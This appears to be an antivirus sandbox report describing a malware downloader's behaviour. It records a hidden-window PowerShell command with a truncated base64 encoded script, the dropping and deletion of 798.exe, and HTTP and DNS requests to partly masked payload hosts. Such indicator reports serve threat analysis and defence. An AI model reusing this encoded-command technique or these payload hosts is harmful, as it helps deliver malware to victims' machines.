Technical Information
Malicious functions
Executes the following (exploit)
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -en PAAjACAAWgB3AGoAYgB2AGYAaQBiAHUAagAgAGgAdAB0AHAAcwA6AC8ALwB3AHcAdwAuAG0AaQBjAHIAbwBzAG8AZgB0AC4AYwBvAG0ALwBXAGoAaQBhAHkAbgBqAGEAdQBrAHAAIAAjAD4AIAAkAFQAYwBvAG0AeABjAHMAaABuAD0AJwBUAHQAZAB4A...
Modifies file system
Creates the following files
- %HOMEPATH%\798.exe
Deletes the following files
- %HOMEPATH%\798.exe
Network activity
TCP
HTTP GET requests
- http://www.gp###rea.org/wp-includes/2rq8ia-18lgf51-219909277/
- http://www.sa######graphicsarts.com/sendmsg/9isph87-mcaal-2297469431/
UDP
- DNS ASK gp###rea.org
- DNS ASK sa######graphicsarts.com
- DNS ASK my##c.site
- DNS ASK so#######r.000webhostapp.com
- DNS ASK ma####n.jobmensa.de
Miscellaneous
Creates and executes the following
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -en PAAjACAAWgB3AGoAYgB2AGYAaQBiAHUAagAgAGgAdAB0AHAAcwA6AC8ALwB3AHcAdwAuAG0AaQBjAHIAbwBzAG8AZgB0AC4AYwBvAG0ALwBXAGoAaQBhAHkAbgBqAGEAdQBrAHAAIAAjAD4AIAAkAFQAYwBvAG0AeABjAHMAaABuAD0AJwBUAHQAZAB4A...' (with hidden window)
